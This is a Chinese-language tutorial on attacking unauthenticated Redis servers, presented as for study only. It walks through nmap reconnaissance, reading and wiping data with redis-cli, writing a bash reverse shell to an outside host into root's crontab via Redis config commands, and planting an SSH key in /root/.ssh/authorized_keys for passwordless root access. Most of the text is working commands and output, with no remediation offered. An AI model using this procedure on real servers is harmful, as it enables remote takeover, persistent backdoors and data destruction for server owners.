文章内容
redis是一个非常快速的,开源的,支持网络,可以基于内存,也可以持久化的日志型,非关系型的键值对数据库。并提供了多种语言的api。有java,c/c++,c#,php,JavaScript,perl,object-c,python,ruby,erlang等客户端,使用方便。
前段时间,Redis的未授权漏洞,成为黑客攻击服务器的主要手段,让开发和运维人员深受其害,黑客攻击redis的主要思路如下:
Redis默认情况下,会绑定在 0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis 的数据。攻击者在未授权访问 Redis 的情况下,利用 Redis 自身的提供的config 命令,可以进行写文件操作,攻击者可以成功将自己的ssh公钥写入目标服务器的 /root/.ssh 文件夹的authotrized_keys 文件中,进而可以使用对应私钥直接使用ssh服务登录目标服务器。
注意,以下技术仅供学习交流使用,请勿作其它用途。
一、扫描漏洞服务器和端口
根据刚才的思路,黑 客第一步是通过扫描软件扫到的6380端口,那么怎么扫服务器和对应的端口呢,有个常用的工具:nmap,很强大的一个网络扫描和嗅探工具包,具体用法不做介绍,先看一个例子:
[root@localhost ~]# nmap -A -p 6380 -script redis-info 182.16.21.32
Starting Nmap 6.40 ( http://nmap.org ) at 2018-10-19 15:02 CST
Nmap scan report for 182.16.21.32
Host is up (0.00058s latency).
PORT STATE SERVICE VERSION
6380/tcp open redis Redis key-value store
| redis-info:
| Version 3.2.12
| Architecture 64 bits
| Process ID 3020
| Used CPU (sys) 0.19
| Used CPU (user) 0.09
| Connected clients 1
| Connected slaves 0
| Used memory 6794.34K
|_ Role master
MAC Address: 18:20:37:AC:B2:73 (Cadmus Computer Systems)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 2.6.32 - 3.9 (96%), Netgear DG834G WAP or Western Digital WD TV media player (96%),
Linux 2.6.32 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6) (94%),
Linux 2.6.32 - 2.6.35 (94%), Linux 2.6.32 - 3.2 (94%), Linux 3.0 - 3.9 (93%), Linux 2.6.32 - 3.6 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 ... 2
3 6.94 ms 21.220.129.1
4 34.80 ms 21.220.129.137
5 1.82 ms 21.200.0.254
6 ... 8
9 28.08 ms 103.216.40.43
10 ...
11 40.72 ms 211.153.11.90
12 ... 14
15 31.09 ms 182.16.21.32
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.56 seconds
看到nmap的威力了吧,一个简单的nmap扫描,把182.16.21.32的6380端口扫的体无完肤,redis的版本,进程ID,CPU信息,redis角色,操作系统类型,MAC地址、路由状态等等信息尽收眼底。
上面这个例子是扫描一个ip,nmap更强大的是可以扫描给定的任意IP段,所有可以嗅探到的主机以及应用信息,都能扫描输出。
有了上面的输出信息,基本可以断定,这个redis是有验证漏洞的,下面攻击就可以进行了。
二、尝试登录redis获取敏感信息
nmap扫描后发现主机的6380端口对外开放,就可以用本地Redis客户端远程连接服务器,连接后就可以获取Redis敏感数据。来看下面的操作:
[root@localhost ~]# redis-cli -h 182.16.21.32 -p 6380
182.16.21.32:6380> info
# Server
redis_version:3.2.12
redis_git_sha1:00000000
redis_git_dirty:0
redis_build_id:3dc3425a3049d2ef
redis_mode:standalone
os:Linux 3.10.0-862.2.3.el7.x86_64 x86_64
arch_bits:64
multiplexing_api:epoll
gcc_version:4.8.5
process_id:3020
run_id:d2447e216a1de7dbb446ef43979dc0df329a5014
tcp_port:6380
uptime_in_seconds:2326
uptime_in_days:0
hz:10
lru_clock:13207997
executable:/root/redis-server
config_file:/etc/redis.conf
可以看到Redis的版本和服务器上内核版本信息,还可以看到Redis配置文件的绝对路径。
继续操作,看看key信息及其对应的值:
182.16.21.32:6380> keys *
1) "user"
2) "passwd"
3) "msdb2"
4) "msdb1"
5) "msdb3"
182.16.21.32:6380> get user
"admin"
182.16.21.32:6380> get passwd
"mkdskdskdmk"
182.16.21.32:6380>
都没问题的,来点删除操作看看:
182.16.21.32:6380> del user
(integer) 1
182.16.21.32:6380> keys *
1) "passwd"
2) "msdb2"
3) "msdb1"
4) "msdb3"
182.16.21.32:6380> flushall
OK
182.16.21.32:6380> keys *
(empty list or set)
182.16.21.32:6380>
能查,能删,del key名称,可以删除键为key的数据,flushall删除所有的数据。
三、尝试从redis植入信息
从redis漏洞植入数据到操作系统的方式有很多种,这里介绍两种。
1、反弹shell注入crontab
首先在远端任意一个客户端监听一个端口,端口可以随意指定,这里指定一个39527端口:
[root@client189 indices]# nc -l 39527
这样,39527在client189主机上已经监听起来了。
接着,在另一个客户端通过redis-cli连接上182.16.21.32的6380端口,来看下面操作:
[root@client199 ~]# redis-cli -h 182.16.21.32 -p 6380
182.16.21.32:6380> set abc "nn*/1 * * * * /bin/bash -i>& /dev/tcp/222.216.18.31/39527 0>&1nn"
OK
182.16.21.32:6380> config set dir /var/spool/cron
OK
182.16.21.32:6380> config set dbfilename root
OK
182.16.21.32:6380> save
OK
简单执行上面四个步骤的操作后,反弹shell已经被植入到了操作系统的crontab中了。是不是太简单了。
现在回到client189这个客户端上来,等待一分钟后,此终端会自动进入到shell命令行,注意看,这个进入的shell就是182.16.21.32主机了。
[root@client189 indices]# nc -l 39527
[root@localhost ~]# ifconfig|grep eth0
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 182.16.21.32 netmask 255.255.255.0 broadcast 182.16.21.255
inet6 fe80::a00:27ff:feac:b073 prefixlen 64 scopeid 0x20<link>
ether 08:00:27:ac:b0:73 txqueuelen 1000 (Ethernet)
RX packets 17415571 bytes 20456663691 (19.0 GiB)
RX errors 0 dropped 156975 overruns 0 frame 0
TX packets 2379917 bytes 2031493944 (1.8 GiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
看到了吧,顺利进入redis服务器了,还是root用户,接下来你想干什么,都行。
最后,解释下上面植入的那个反弹shell和redis命令。先看这个反弹shell的内容:
/bin/bash -i>& /dev/tcp/222.216.18.31/39527 0>&1
- 首先,“bash -i”是打开一个交互的bash,这个最简单。
- 其次,/dev/tcp/是Linux中的一个特殊设备,打开这个文件就相当于发出了一个socket调用,建立一个socket连接,读写这个文件就相当于在这个socket连接中传输数据。同理,Linux中还存在/dev/udp/。
- 接着,“>&”其实和“&>”是一个意思,都是将标准错误输出重定向到标准输出。
- 最后,“0>&1”和“0<&1”也是一个意思,都是将标准输入重定向到标准输出中。
你要问这个0、1、2是什么意思吗,那我也解释下吧,在linux shell下,常用的文件描述符有如下三类:
- 1)标准输入 (stdin) :代码为0,使用 < 或 << ;
- 2)标准输出 (stdout):代码为1,使用 > 或 >> ;
- 3)标准错误输出(stderr):代码为2,使用 2> 或 2>>。
好了,基础普及完了,说下上面这个反弹shell的意思吧。综上所述,这句反弹shell的意思就是,创建一个可交互的bash和一个到222.216.18.31:39527的TCP链接,然后将bash的输入、输出错误都重定向到222.216.18.31的39527监听端口上。其中,222.216.18.31就是我的客户端主机地址。
下面再看几个redis命令的含义:
config set dir /var/spool/cron
表示设置redis的备份路径为/var/spool/cron。
config set dbfilename root
设置本地持久化存储数据库文件名,这里是root。
save
表示将保存设置,也就是将上面的配置写入磁盘文件/var/spool/cron/root中。
看到了吧,这三个redis指令,无形中就将反弹shell写入了系统计划任务中了。这个计划任务的策略是每隔一分钟执行一次这个反弹shell。而一旦反弹shell成功执行,在远端监听的端口就可以直接连入redis服务器了。
2、写入ssh公钥进行无密码登录操作系统
上面那个反弹shell植入方式稍微麻烦,其实还有更简单的方式,通过将客户端公钥写入redis服务器上的公钥文件authorized.keys即可,简单、省心。
如何做呢,思路就是在redis中插入一条数据,将本机的公钥作为value,key值随意,然后通过修改redis的默认存储路径为/root/.ssh和默认的公钥文件authorized.keys,把缓冲的数据保存在这个文件里,这样就可以在redis服务器的/root/.ssh下生一个授权的key,实现无密码登录。
来看看具体的操作吧:
- 首先在任意一个客户端主机上生成一个key
[root@client200 ~]# ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa):
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /root/.ssh/id_rsa.
Your public key has been saved in /root/.ssh/id_rsa.pub.
The key fingerprint is:
7f:4b:c1:1d:83:00:2f:bb:da:b5:b5:e3:76:23:6a:77 root@client200
The key's randomart image is:
+--[ RSA 2048]----+
| ... |
| . . . |
| . . . o |
| o . . o |
| S o . |
| o . |
| . o + |
| o ..==oE |
| . ..o=+= . |
+-----------------+
- 接着,将公钥导入key.txt文件(前后用n换行,是为了避免和Redis里其他缓存数据混合),再把key.txt文件内容写入目标主机的缓冲里
[root@client200 ~]# cd /root/.ssh/
[root@client200 .ssh]# (echo -e "nn"; cat id_rsa.pub; echo -e "nn") > key.txt
[root@client200 .ssh]# cat /root/.ssh/key.txt | ./redis-cli -h 182.16.21.32 -x set abc
OK
- 最后,从客户端主机登录到redis命令行,执行如下操作
[root@client200 .ssh]# redis-cli -h 182.16.21.32 -p 6380
182.16.21.32:6380> keys *
1) "abc"
182.16.21.32:6380> get abc
"nnnssh-rsa AAAAB3NzaC1yc2EAAAADDDDAQABAAQDIr/VD1C243FuDx2UNpHz0CbN+nln9WQPEnsCH6OVL2cM/MkqKivTjb8KLgb85luR/AQPu4j2eZFBDz8uevaqKZp28NoTjwLTikju+CT1PVN/OVw1Uouu1YEdFMcvYXG4ww9hQm75374NkO6x8+x5biDNzWAtiw3M+bX+bef0SW3n/JYfVMKvxmYpq5fqXwUqxptzr85Sy8EGrLNlgsRNsnJ0XtprAsNHdx8BJoR7/wZhknbIr2oEXEpPjg6U9YIaqdMRRcgSjuosH8UW4wOBvX9SAvpHjRtJB1ECKPycaXUIBhsDyCO2uJ4syY1xTKQTFeoZepl6Im5qn8t root@client200nnnn"
182.16.21.32:6380> config set dir /root/.ssh
OK
182.16.21.32:6380> config set dbfilename authorized_keys
OK
182.16.21.32:6380> config get dir
1) "dir"
2) "/root/.ssh"
182.16.21.32:6380> save
OK
从redis命令行可以看出,刚才的key abc已经写入,写入的内容就是id_rsa.pub公钥的内容。然后通过将redis的备份路径修改为/root/.ssh,本地持久化存储数据文件设置为authorized_keys,其实就是创建了/root/.ssh/authorized_keys文件,并将id_rsa.pub内容写入了authorized_keys文件中。
到此为止,公钥已经成功植入到了redis服务器上。接下来,就可以在客户端主机上无密码登录了,来试一下:
[root@client200 .ssh]# ssh 182.16.21.32
Last login: Fri Oct 19 17:29:01 2018 from 222.216.18.31
[root@localhost ~]# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 182.16.21.32 netmask 255.255.255.0 broadcast 182.16.21.255
inet6 fe80::a00:27ff:feac:b073 prefixlen 64 scopeid 0x20<link>
ether 08:00:27:ac:b0:73 txqueuelen 1000 (Ethernet)
RX packets 17433764 bytes 20458295695 (19.0 GiB)
RX errors 0 dropped 157673 overruns 0 frame 0
TX packets 2383520 bytes 2031743086 (1.8 GiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
可以看到不用密码就可以直接远程登录redis系统,那么再来看看redis服务器上被写入的/root/.ssh/authorized_keys文件的内容:
[root@localhost .ssh]# cat /root/.ssh/authorized_keys
REDIS0007dis-ver3.2.12edis-bitsctime[ed-mem?
ssh-rsa AAAAB3NzaC1yc2EAAAADDDAQABAAQDIr/VD1C243FuDx2UNpHz0CbN+nln9WQPEnsCH6OVL2cM/MkqKivTjb8KLgb85luR/AQPu4j2eZFBDz8uevaqKZp28NoTjwLTikju+CT1PVN/OVw1Uouu1YEdFMcvYXG4ww9hQm75374NkO6x8+x5biDNzWAtiw3M+bX+bef0SW3n/JYfVMKvxmYpq5fqXwUqxptzr85Sy8EGrLNlgsRNsnJ0XtprAsNHdx8BJoR7/wZhknbIr2oEXEpPjg6U9YIaqdMRRcgSjuosH8UW4wOBvX9SAvpHjRtJB1ECKPycaXUIBhsDyCO2uJ4syY1xTKQTFeoZepl6Im5qn8t root@client200
`?L
在authorized_keys文件里可以看到redis的版本号,以及写入的公钥和一些缓冲的乱码。
好啦,redis服务器已经成功被植入后 门,接下来,你可以做你想做的任意事情了。